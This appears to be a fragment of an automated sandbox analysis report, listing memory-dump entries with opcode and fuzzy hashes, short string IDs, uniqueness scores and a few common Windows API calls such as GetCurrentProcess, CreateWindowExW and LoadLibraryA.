                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: _
                                                • API String ID: 0-701932520
                                                • Opcode ID: ca66d5b85e049edec128fa4a4282438791c617553f83932a41eb1b293db92bc1
                                                • Instruction ID: f7dcb8a46d46463234e836c271c8c9063a43acf7609201eba79550bb18fe4b0c
                                                • Opcode Fuzzy Hash: ca66d5b85e049edec128fa4a4282438791c617553f83932a41eb1b293db92bc1
                                                • Instruction Fuzzy Hash: CB51E2727042099FCB12DF68E8548AFBBFAEF89311F14806AF619D7251DB31D811CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: fbfbd4ed8d84c288f0aeee7d6575093f6596b09e202fdf3901cd449dd31cb36f
                                                • Instruction ID: 5bf34653d5c003b842ea0aac7d46e29d0ce6b3f71b3b1e127a21d0f3edf7edc5
                                                • Opcode Fuzzy Hash: fbfbd4ed8d84c288f0aeee7d6575093f6596b09e202fdf3901cd449dd31cb36f
                                                • Instruction Fuzzy Hash: C3517FB5A002199FDB15CFA8C885AEEBBF5FF48310F148069EA15EB291DB34DD54CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                • Opcode ID: de64692f8207ffe35c8d3c769a2f48de9e3a5cc4e34377b4a8b052a63cd0988d
                                                • Instruction ID: dcbff840fb8076cac9bf073942a0974e05b6269cb0a498f0ccb94d25dc74b430
                                                • Opcode Fuzzy Hash: de64692f8207ffe35c8d3c769a2f48de9e3a5cc4e34377b4a8b052a63cd0988d
                                                • Instruction Fuzzy Hash: 6241F1B8710200CFD718EB78E55676A37BAEB8930CF1144A9D216AB3D4DFB59C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                • Opcode ID: 6722e70aade0dfb48d895ac2442a1bf6e1ef9b46fc2401edd581ba1cec675a24
                                                • Instruction ID: 136a844b8aea2f02197b4eb95760537ddefa9296abe665b7a0843743c4859005
                                                • Opcode Fuzzy Hash: 6722e70aade0dfb48d895ac2442a1bf6e1ef9b46fc2401edd581ba1cec675a24
                                                • Instruction Fuzzy Hash: B341E1B8710200CFDB18EB78E55676A33AAFB8930CF114468D216AB3D4DFB59C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                • Opcode ID: d4318d7d74e22f5cdcfcea773f6f859bc42c1e544094fd63e0290f11a34b945f
                                                • Instruction ID: 8cef4ccfcc81d0a4cf7b1b12677ffdafcb4f1927c3f6293fe69bd5595abc423e
                                                • Opcode Fuzzy Hash: d4318d7d74e22f5cdcfcea773f6f859bc42c1e544094fd63e0290f11a34b945f
                                                • Instruction Fuzzy Hash: DA31C378710100CFD718EB68E55676A33AAFB8930CF1140A8D216AF7D5DF759C42CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 6e432b79b06a2e5c6a887ce55a238d3c3075ca3dc2825358806ca76d7fd8462b
                                                • Instruction ID: df0aaed51aca1cec2ded78d91add96579dde821ccea657005b6af5159465d8be
                                                • Opcode Fuzzy Hash: 6e432b79b06a2e5c6a887ce55a238d3c3075ca3dc2825358806ca76d7fd8462b
                                                • Instruction Fuzzy Hash: 97218372A002199FDB15CF65C885EEEBBF9FF49310F048129E915DB251DB34DA45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: "
                                                • API String ID: 0-123907689
                                                • Opcode ID: 034dfedd70e6666ef3b463c5e99f936ec68784a3d627da5dad781f6cccc6e95d
                                                • Instruction ID: 7f4fd781c7ff672908eb3591cc056c126607ea24a98c2bf9d75ac81a498901b3
                                                • Opcode Fuzzy Hash: 034dfedd70e6666ef3b463c5e99f936ec68784a3d627da5dad781f6cccc6e95d
                                                • Instruction Fuzzy Hash: 0F014771700209ABDB10DF65D840AAFFFFAEF81314F008929E144AB290D734EA0987E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-3993045852
                                                • Opcode ID: f35390bbb72f6c058cdef17658b25b36e23c3031e54cb9c85443c9dbadb191c5
                                                • Instruction ID: 01514d167e04b1bf566be4262732f34f9e55660065fcf6b14e2fb57e225a20d0
                                                • Opcode Fuzzy Hash: f35390bbb72f6c058cdef17658b25b36e23c3031e54cb9c85443c9dbadb191c5
                                                • Instruction Fuzzy Hash: DD01D671B002199BCB10DF65E8409AFFFFAFF85354F008929E5949B290D770AA0987E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7b76f233e2bfb82c289384e29c0da00a7032925f2f5621960afa1c61c305c1f
                                                • Instruction ID: 70bf41ba8b5ecb884d70ef7b4d5abb4f8f37509af0c42b813db44984260b0d0c
                                                • Opcode Fuzzy Hash: a7b76f233e2bfb82c289384e29c0da00a7032925f2f5621960afa1c61c305c1f
                                                • Instruction Fuzzy Hash: F5412775304600CFC719CF69D4A8E2AB7F6FF89610B1545A9E68A8B7B6CB70EC41CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e99dd829d71614c95daf0292ec07b0bba0ba9565db965dca03f878f9521f4348
                                                • Instruction ID: dfc7622fd9af729e56f69a1d66c2b04e5e31f77e1b2535853674b75c745dfb3b
                                                • Opcode Fuzzy Hash: e99dd829d71614c95daf0292ec07b0bba0ba9565db965dca03f878f9521f4348
                                                • Instruction Fuzzy Hash: FE3193B1B0020B9FCB15DF69C855AAFF7F6AF88310F148429D649DB290EB70E911CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 036f29549e721e30ab85ad0a07f59af58802ad2fd2e6f42d801debcf86a507f7
                                                • Instruction ID: 1e9cbce61f069ef4a579921835dae14c9bc459fb2174c8f11d79f2671413a5a0
                                                • Opcode Fuzzy Hash: 036f29549e721e30ab85ad0a07f59af58802ad2fd2e6f42d801debcf86a507f7
                                                • Instruction Fuzzy Hash: 6741E8747106158FCB08DF69C589A6ABBFAFF48705B1580A9E605CB361DB75E840CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b946c50bb4bdf93d75e69e90546d66e38768ab539b7a9b761d61a15a96eb0f0
                                                • Instruction ID: 3c5f03cbdab5c2a2ab5327dd63c0ced8ed0648b31ef695a9d19ce1d3bf9a146e
                                                • Opcode Fuzzy Hash: 6b946c50bb4bdf93d75e69e90546d66e38768ab539b7a9b761d61a15a96eb0f0
                                                • Instruction Fuzzy Hash: CB3190B5B002169FCB15DF68D8904BFB7B5FF89211B1404A5DE50A7391DB70EE41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1a78ebe222829b96f8f89888b8c09dd3821b2c9da0094852d892b8fe785a5d6
                                                • Instruction ID: 5741eecf5d6ada83f6157fc05640157ee6874c08e3e0d71cc0322e95edd2bb7f
                                                • Opcode Fuzzy Hash: d1a78ebe222829b96f8f89888b8c09dd3821b2c9da0094852d892b8fe785a5d6
                                                • Instruction Fuzzy Hash: F34137B5718505EFCB26CF68C490969BBB6FF89320B15C495FA1A8B396CB30E941CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 330f279d056df22db3eb1438e4b7ecf1fc8997088275b3522641fb104d917255
                                                • Instruction ID: 55d09310f0111ded042a8e897a76e4fee3d4d3fa192cbdc737f6bcc24d8e7650
                                                • Opcode Fuzzy Hash: 330f279d056df22db3eb1438e4b7ecf1fc8997088275b3522641fb104d917255
                                                • Instruction Fuzzy Hash: D231A175B102158FCB18EF75C86566EBBB6EF88210B0045ADD90AD73A5EF30AD05CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12cd4ac58ab450f8020cd3c2470a7fd4e9b322556b378548e5f8b0d3c936c444
                                                • Instruction ID: 63dc61bf4a22689d1a610e5544f689306fa1930765716b6041c17794095492b9
                                                • Opcode Fuzzy Hash: 12cd4ac58ab450f8020cd3c2470a7fd4e9b322556b378548e5f8b0d3c936c444
                                                • Instruction Fuzzy Hash: D031C375B142148FC7099BB8D8645AE7BB6EBCA310F9000EBD61ADB391DF349D068792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 018465dc9b0d233e4e4a536f6e6bc5d61ed853e564b848a4ee0c6fa6f7abafbc
                                                • Instruction ID: d485329fe4208ab9033f15153e2c98674571522753ee6516cfbf12a95acab1a7
                                                • Opcode Fuzzy Hash: 018465dc9b0d233e4e4a536f6e6bc5d61ed853e564b848a4ee0c6fa6f7abafbc
                                                • Instruction Fuzzy Hash: E4315AB07006058FCB09DF29C499A6ABFF9FF48715F1540A9E505CB3A2DB75E840CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c95eafb1c96fa32e4a10062fbb3d4277463a87c2fa5aba51081d4a9653107e42
                                                • Instruction ID: c189e33f4de618e9c42bb325281b97f273c84daee392b8c1c02d89f097764045
                                                • Opcode Fuzzy Hash: c95eafb1c96fa32e4a10062fbb3d4277463a87c2fa5aba51081d4a9653107e42
                                                • Instruction Fuzzy Hash: 9C217F753101119FC7149F3AD498D2ABBEAAF89604B1540ADE606CB3A1DF70DC01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 896d503f531a586bc4f8becb98c52cccb131e2ca020dc70774d0d71f70387420
                                                • Instruction ID: 7f4988e6e90a26223848cd47e1334b20bb4d0a5e2ef49c01468065ac88e0362e
                                                • Opcode Fuzzy Hash: 896d503f531a586bc4f8becb98c52cccb131e2ca020dc70774d0d71f70387420
                                                • Instruction Fuzzy Hash: DA310471700306DFCB11CF64E85496AFBB6FF88315B0085A9E5499B391DB31ED02CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68f373e356cf2a010e7afea4bf1ae91729ab3422dec4a92a2b8851720d011f77
                                                • Instruction ID: a2cd0d460927a47f775c200da3790784e1f6cbef4d88a888799f552a369a7f20
                                                • Opcode Fuzzy Hash: 68f373e356cf2a010e7afea4bf1ae91729ab3422dec4a92a2b8851720d011f77
                                                • Instruction Fuzzy Hash: CF217FB5B102158FCB18EF75C89566EBBB6FF88210B004579D60AD72A5EF31AD04CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aebc3d93c1ab60af39b1b972de1ac5d99f4c5e3a081005ebc4fa00e3b0dc42fd
                                                • Instruction ID: 4376cd0edce7694a21a3fafaf7a398fba5afb91d12c47193987ed9639004ddad
                                                • Opcode Fuzzy Hash: aebc3d93c1ab60af39b1b972de1ac5d99f4c5e3a081005ebc4fa00e3b0dc42fd
                                                • Instruction Fuzzy Hash: A92171B5E0010A9FCB04DFA5D455AAEBBF6FF85304F408065D215E7390EB749A06CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8138f3e1e056198fa8776675251b6b760dda003224a8278bb8908778e6b6cda2
                                                • Instruction ID: 57461eb0309ebf74de5a51f9b5cec7150d307854a8286f75d372380e57bf9134
                                                • Opcode Fuzzy Hash: 8138f3e1e056198fa8776675251b6b760dda003224a8278bb8908778e6b6cda2
                                                • Instruction Fuzzy Hash: E1217CB1A01616DFCB15CFA4D98496AFBF2FF88314F1085A8E549AB361D730ED01CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0315f2aad5fbe61eba216290a3303e913881a1c1752252d2cbbd2f38a51e9766
                                                • Instruction ID: 3a84c581d255cee7fdb97d2af2d6e990abe925a24fcd1b14e3c5c1c8f82041d1
                                                • Opcode Fuzzy Hash: 0315f2aad5fbe61eba216290a3303e913881a1c1752252d2cbbd2f38a51e9766
                                                • Instruction Fuzzy Hash: A9118EB52093408FC316DF34D8849167BB9EF8A218B1544BDE54ACB792DB31DC46CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb44d344db64a1c8827d4e4e7867d0c9f23e26615e09ceaee95f8a9260449d2e
                                                • Instruction ID: 128a1cf8bda53a00132b3a680873e467e00d33704fa288bc8d15398544f015f9
                                                • Opcode Fuzzy Hash: bb44d344db64a1c8827d4e4e7867d0c9f23e26615e09ceaee95f8a9260449d2e
                                                • Instruction Fuzzy Hash: EE2150B5E0020A8FDB04DFA9D4559AEBBF6FF85304F008465D211A7394EB749906CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d91318d75fa66516771ee9bd4c14ba81719e2d0e0d97df016e8afd2811471e20
                                                • Instruction ID: 469867606e64b0d9133e53afe141d2e427609960617797359cae9c463e131ff0
                                                • Opcode Fuzzy Hash: d91318d75fa66516771ee9bd4c14ba81719e2d0e0d97df016e8afd2811471e20
                                                • Instruction Fuzzy Hash: A821C271A0061ADFCB15CFA4D98496AFBF1FF89314B1085A8D5489B351C730EC06CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1c1dbced9e6af428594757738523da9eb48a09bb327f7418f651e60be1f9332
                                                • Instruction ID: c5b59c4909eaec44f77fb3ae908a3020808541a3c525fb4c3530400b414ad62d
                                                • Opcode Fuzzy Hash: f1c1dbced9e6af428594757738523da9eb48a09bb327f7418f651e60be1f9332
                                                • Instruction Fuzzy Hash: 6311A3727102128B8714A778885087AE6D7DBC86147418A7DD709CB3A5EF71AC0643E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f88dd04e9bac4002997e43261cf65d54b48778bf08d6f6388a60945a7d71375e
                                                • Instruction ID: 6ff8b70edfac795d7148238f5b34bb44c0e8a448b3bd0f15311ee0a7158fa109
                                                • Opcode Fuzzy Hash: f88dd04e9bac4002997e43261cf65d54b48778bf08d6f6388a60945a7d71375e
                                                • Instruction Fuzzy Hash: 62118FB660A7808FC3178B34ACA48527FB5AF8721534900EBE489CB7A3D735DC4AC721
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b3243e9b99524954a87355652d10a7304aa6ff11dfc9a8c46e188de02427cd9
                                                • Instruction ID: 386a7b1499ca77b53bbb4a4fd01cf2bdb16c8d302256ce8671e39538bc93fac6
                                                • Opcode Fuzzy Hash: 3b3243e9b99524954a87355652d10a7304aa6ff11dfc9a8c46e188de02427cd9
                                                • Instruction Fuzzy Hash: 6E112BB57246128BC7196774A53563A3BE9DFC5310B8500EADA49DB3C1DF24DC41C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 601780e33c5d9cf8e4fec3000e8ffca5a700e1588e87ca739401263c0d81ece3
                                                • Instruction ID: 761992a592a4ecb9e2f02b19385dc00cdc31ebb121b06dcd460eb759e782dee0
                                                • Opcode Fuzzy Hash: 601780e33c5d9cf8e4fec3000e8ffca5a700e1588e87ca739401263c0d81ece3
                                                • Instruction Fuzzy Hash: 6F11E5B23002118BC724A7348950A6AE7D7EFC4610B458A7DD7498B2A5EB21EC0A83E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 269eb75567a5ce9a2cae0839c2510214817861bcad187b1c9d99fe6adb151a2a
                                                • Instruction ID: f1248e9c19c55d55342857a16734147526d5113f48832a67b5854c75ff61a9a8
                                                • Opcode Fuzzy Hash: 269eb75567a5ce9a2cae0839c2510214817861bcad187b1c9d99fe6adb151a2a
                                                • Instruction Fuzzy Hash: 6611DDB0A006068FD720CB58C908BAEBBF1FF40364F058469D6188B691E378E901CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 429cb9e5582deaeb4a54e5e19787d87d5ed6f2cc6649a853e2818be53f37aba8
                                                • Instruction ID: 28a122e6d3b8d66ac8bd3028b79319d38f74355704db4f58643982282f20b74c
                                                • Opcode Fuzzy Hash: 429cb9e5582deaeb4a54e5e19787d87d5ed6f2cc6649a853e2818be53f37aba8
                                                • Instruction Fuzzy Hash: C6119D356102059FC704DF28C884D9EBBB6FF89324B248599E8498B362DB71ED02CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d5e9fc07df17efa54ed35623ec01c5feaebd6ccd58478e2b0dfa6f14a7c137a
                                                • Instruction ID: 31161c1da7aae384fe6f6585bf8cc42a0206f67dbd6377fd21e7dde16307220f
                                                • Opcode Fuzzy Hash: 5d5e9fc07df17efa54ed35623ec01c5feaebd6ccd58478e2b0dfa6f14a7c137a
                                                • Instruction Fuzzy Hash: EB118CB5A00606DFDB24DF54C944BADFBE2FF44324F858469D6089B6A1E378E941CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e40006613073efff42e9795e2efda0f9d58fdc21a14dbc1ae62c76a341ca1843
                                                • Instruction ID: 9c79d061afbb10d7ab2c6b151264912dc91ab1bdfbbd31e5e5892092f44b992a
                                                • Opcode Fuzzy Hash: e40006613073efff42e9795e2efda0f9d58fdc21a14dbc1ae62c76a341ca1843
                                                • Instruction Fuzzy Hash: 9D11CE717003059FC7209F64E45496AFBFAFF89314B008869E549CB360DB30EC05CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68e79d2ee44e2f1a84a33ea3f0e3584a2946820296040129675083dbb85dda85
                                                • Instruction ID: 2380c8244c37bc6da344d529b0eb6c17eef59c2a3f6e1dcdf8d9eddce9f4c6ec
                                                • Opcode Fuzzy Hash: 68e79d2ee44e2f1a84a33ea3f0e3584a2946820296040129675083dbb85dda85
                                                • Instruction Fuzzy Hash: 740128B361A2808FE702DB68D8A4EC57FB2EF6627471944D6D0888B262D624EC07D751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: %
                                                • API String ID: 0-2567322570
                                                • Opcode ID: bf752e0092f8eb2bdab58746dffe44e01760050662a2a489cfdbd34180d0ff0e
                                                • Instruction ID: 69f7f975f0618021a44ceadf3c8ef968ed5f905c23fefcbfc2677aa0bb653ed3
                                                • Opcode Fuzzy Hash: bf752e0092f8eb2bdab58746dffe44e01760050662a2a489cfdbd34180d0ff0e
                                                • Instruction Fuzzy Hash: C4025F74A00209CFDB14DFB5C494AAEBBB6FF88304F1084ADD505AB395DBB1AD46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$t%Qf$t%Qf
                                                • API String ID: 0-2797057296
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$(Uf$4/Xf$4/Xf$D!Qf$D!Qf$D!Qf$D!Qf$\Pf$\Pf$\Pf$t%Qf$t%Qf$#"
                                                • API String ID: 0-168133937
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0188B6F0
                                                • GetCurrentThread.KERNEL32 ref: 0188B72D
                                                • GetCurrentProcess.KERNEL32 ref: 0188B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 0188B7C3
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0188B6F0
                                                • GetCurrentThread.KERNEL32 ref: 0188B72D
                                                • GetCurrentProcess.KERNEL32 ref: 0188B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 0188B7C3
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 018898D6
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0188FE0A
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0188FE0A
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 01885411
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 01885411
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 07BE96E2
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474812205.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
